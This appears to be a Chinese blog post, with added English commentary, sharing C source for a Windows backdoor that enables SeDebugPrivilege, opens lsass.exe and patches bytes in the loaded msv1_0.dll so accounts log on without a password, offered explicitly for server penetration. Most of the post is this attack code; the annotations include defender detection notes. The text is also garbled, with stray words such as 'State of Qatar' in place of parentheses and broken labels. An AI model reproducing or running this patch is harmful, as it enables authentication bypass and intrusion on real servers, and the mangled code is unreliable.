定义控制台应用程序的入口点

c语言windows后门

在WINDOWS服务器渗透的时候或然用的着,也能够让xx界里的爱人学点东西
效果与利益在帐户有组计谋限定的时候,不可能增添管理员账号的时候,
能够毫无密码登入。
测量试验在XP,2004,二〇〇三上过。运营后无需用密码。模仿GOLDSUN的十三分写的。
// get.cpp : 定义控制台应用程序的入口点。
//
#include “stdio.h”
#include <windows.h>
#include <TLHELP32.H>

// Enables SeDebugPrivilege (SE_DEBUG_NAME) on the current process token.
// Returns (GetLastError()==ERROR_SUCCESS) after AdjustTokenPrivileges when the
// token could be opened, and TRUE when OpenProcessToken itself failed — i.e. the
// failure path reports success, so the return value is not a reliable signal
// (main() below ignores it anyway).
// Defender note: SeDebugPrivilege can only be enabled by accounts that hold it
// (administrators by default). A user-mode process turning it on and then
// opening lsass.exe (see getpid()/main()) is a high-fidelity LSASS-tampering
// indicator in privilege-use and process-access telemetry, and least-privilege
// accounts stop the program at this first step.
BOOL EnablePriv(State of Qatar// raise this process's privileges (SeDebugPrivilege)
{
HANDLE hToken;
if (
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)
)
{
       TOKEN_PRIVILEGES tkp;
     
       LookupPrivilegeValue(
NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid 卡塔尔国; // look up the LUID of SeDebugPrivilege (return value unchecked)
       tkp.PrivilegeCount=1;
       tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
       AdjustTokenPrivileges( hToken,FALSE,&tkp,sizeof tkp,NULL,NULL State of Qatar;
// Apply the change. AdjustTokenPrivileges may return TRUE yet leave
// ERROR_NOT_ALL_ASSIGNED in GetLastError() when the privilege is not held,
// which is why GetLastError() is consulted here. hToken is never closed.

return( (GetLastError()==ERROR_SUCCESS) );
}
return TRUE;

// Returns the process id of the first process whose image name is "lsass.exe"
// (compared case-insensitively via CharLower) in a Toolhelp process snapshot.
// Known defects, left as written: CreateToolhelp32Snapshot's result is not
// checked; the snapshot handle is leaked on the found path (CloseHandle is
// only reached when nothing matched); and when no match exists the function
// falls off the end with no return value, which is undefined behaviour for
// the pid that main() then hands to OpenProcess.
// Defender note: enumeration followed by OpenProcess(PROCESS_ALL_ACCESS) on
// lsass.exe (main) is recorded by process-access telemetry such as Sysmon
// Event ID 10 with the granted access mask, and is blocked outright by LSA
// Protection (protected process light) / Credential Guard on Windows versions
// that support them — not the XP/2003 targets the header text mentions.
DWORD getpid()
{
HANDLE toolhelp;
toolhelp = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe32;
pe32.dwSize=sizeof(PROCESSENTRY32);
BOOL bRet = Process32First(toolhelp,&pe32);
while(bRet)
{
// early return leaks 'toolhelp'
if (0 == strcmp(CharLower(pe32.szExeFile),”lsass.exe”)) return
pe32.th32ProcessID;

bRet = Process32Next(toolhelp,&pe32);
}

CloseHandle(toolhelp);
// no return value on this path (undefined behaviour)
}

// Entry point. What the code as written does, in order:
//   1. EnablePriv()                 - enable SeDebugPrivilege (result ignored)
//   2. LoadLibrary("msv1_0.dll")    - map the NTLM authentication package into
//                                     this process so its image can be scanned
//   3. two inline-asm scans          - walk forward from the module base for
//                                     the byte sequence 8B 4D 0C 49, then from
//                                     there for 32 C0, recording that address
//   4. WriteProcessMemory            - overwrite those two bytes with B0 01
//                                     inside lsass.exe at the same address
// The header text claims the net effect is NTLM logon without a password;
// presumably the patched bytes force the password-check result (confirm by
// disassembly). The address found locally is reused in lsass.exe, so the
// code relies on msv1_0.dll being mapped at the same base in both processes.
// Defender notes: nothing on disk is modified — the change lives only in
// lsass.exe's memory and disappears on reboot, so file-integrity scanning
// will not see it; comparing in-memory code pages of lsass-loaded modules
// against the on-disk image does. The observable chain is
// AdjustTokenPrivileges(SeDebugPrivilege) -> OpenProcess(lsass, PROCESS_ALL_ACCESS)
// -> WriteProcessMemory, all standard process-access/memory-write telemetry.
// Code-quality notes: both asm scans have no upper bound, so an absent pattern
// reads past the mapped image; pushad/32-bit pointers and MSVC __asm limit this
// to 32-bit builds; WriteProcessMemory's return value is unchecked; 'writbyte'
// is overwritten with GetLastError() before being printed, so the printed
// number is the last error code, not the byte count; the process handle is
// never closed and FreeLibrary is commented out.
int main(void)
{
HMODULE hmodule;
DWORD temp,pid;
HANDLE process;
char buffer[2];
DWORD writbyte;
EnablePriv();
hmodule = LoadLibrary(“msv1_0.dll”);
// scan 1: from the module base, find 8B 4D 0C 49 and leave its address in 'temp'
__asm{
pushad
mov eax,hmodule
bijiao: cmp byte PTR [eax],8bh
jnz sarchnext
cmp byte PTR [eax+1],4dh
jnz sarchnext
cmp byte PTR [eax+2],0ch
jnz sarchnext
cmp byte PTR [eax +3],49h
jz finds

sarchnext:inc eax
jmp night
finds :
mov temp,eax
popad
}
// scan 2: continue from 'temp' until the bytes 32 C0 are found; 'temp' then
// holds the address that is patched below
__asm{
pushad
mov eax,temp
sear: cmp byte PTR [eax],32h
jnz searnext
cmp byte PTR [eax+1],11000000b
jnz searnext
jz findss
searnext: inc eax
jmp sear
findss: mov temp,eax
popad
}
// memset((LPVOID)temp,0xb0,1);
// memset((LPVOID)(temp+1),0x01,1);

pid = getpid();
// PROCESS_ALL_ACCESS on lsass.exe: the access mask that process-access
// telemetry and LSA Protection key on
process = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
// patch bytes B0 01 staged in a local buffer
memset(buffer,0xb0,1);
memset((LPVOID)(buffer+1),0x01,1);
WriteProcessMemory(process,(LPVOID)temp,buffer,sizeof(buffer),&writbyte);
// overwrites the bytes-written count; the printed value is the last error code
writbyte =GetLastError();
printf(“%d”,writbyte);
//MessageBox(NULL,”find ok”,”title”,MB_OK);
// FreeLibrary(hmodule);
return 0;

}